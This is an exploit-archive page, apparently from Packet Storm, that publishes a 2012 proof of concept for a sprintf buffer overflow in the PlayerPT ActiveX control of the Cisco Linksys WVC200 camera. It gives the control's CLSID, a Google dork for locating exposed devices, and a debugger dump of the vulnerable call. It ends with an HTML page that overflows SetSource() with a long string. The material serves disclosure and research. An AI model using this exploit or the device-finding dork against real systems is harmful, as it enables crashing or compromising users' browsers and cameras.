exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Linksys WVC200 PlayerPT Buffer Overflow

Cisco Linksys WVC200 PlayerPT Buffer Overflow
Posted Mar 22, 2012
Authored by rgod | Site retrogod.altervista.org

Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT active-x control (PlayerPT.ocx) suffers from a sprintf buffer overflow vulnerability. Version 1.0.0.15 is affected.

tags | exploit, overflow, activex
systems | cisco
SHA-256 | 3933dd1431da4c063e62908b6d60cf61accefadfda1561e952bfa4c9d5163a86

Cisco Linksys WVC200 PlayerPT Buffer Overflow

Change Mirror Download
<!--
Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX
Control PlayerPT.ocx sprintf Buffer Overflow Vulnerability

when viewing the device web interface it asks
to install an ActiveX control with the following settings:

ProductName: PlayerPT ActiveX Control Module
File version: 1.0.0.15
Binary path: C:\WINDOWS\system32\PlayerPT.ocx
CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
ProgID: PLAYERPT.PlayerPTCtrl.1
Safe for scripting (registry): True
Safe for initialization (registry): True

try this google dork for WVC200:
linksys wireless-g ptz inurl:main.cgi

Vulnerability:
the SetSource() method is vulnerable to a buffer overflow
vulnerability. Quickly, ollydbg dump:

...
03238225 8B5424 20 mov edx,dword ptr ss:[esp+20]
03238229 894424 10 mov dword ptr ss:[esp+10],eax
0323822D B9 32000000 mov ecx,32
03238232 33C0 xor eax,eax
03238234 8B72 F8 mov esi,dword ptr ds:[edx-8]
03238237 8DBC24 E8020000 lea edi,dword ptr ss:[esp+2E8]
0323823E F3:AB rep stos dword ptr es:[edi]
03238240 8B3D 0C062603 mov edi,dword ptr ds:[<&MSVCRT.sprintf>] ; msvcrt.sprintf
03238246 52 push edx
03238247 8D8C24 EC020000 lea ecx,dword ptr ss:[esp+2EC]
0323824E 68 48612603 push PlayerPT.03266148 ; ASCII "%s"
03238253 51 push ecx
03238254 FFD7 call edi <---------------boom
...

rgod
-->
<!-- saved from url=(0014)about:internet -->
<HTML>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' />
</object>
<script>
var x="";
for (i=0; i<13999; i++){
x = x + "aaaa";
}
obj.SetSource("","","","",x);
</script>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close